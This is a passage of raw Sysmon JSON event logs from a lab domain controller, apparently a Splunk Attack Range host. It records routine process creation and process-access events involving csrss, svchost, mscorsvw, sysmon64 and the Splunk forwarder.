06:00:47.950","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-050F-5F25-0000-001068141300}","TargetProcessId":"4468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8090,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:47.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-050F-5F25-0000-001068141300}\r\nTargetProcessId: 4468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:47.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-050F-5F25-0000-001068141300}","TargetProcessId":"4468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8091,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.216\r\nProcessGuid: {A837DB8D-0512-5F25-0000-0010EC181300}\r\nProcessId: 1320\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.216","ProcessGuid":"{A837DB8D-0512-5F25-0000-0010EC181300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8092,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.215\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0512-5F25-0000-0010EC181300}\r\nTargetProcessId: 1320\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.215","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0512-5F25-0000-0010EC181300}","TargetProcessId":"1320","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8093,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.215\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0512-5F25-0000-0010EC181300}\r\nTargetProcessId: 1320\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.215","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0512-5F25-0000-0010EC181300}","TargetProcessId":"1320","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8094,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8095,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8096,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8097,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
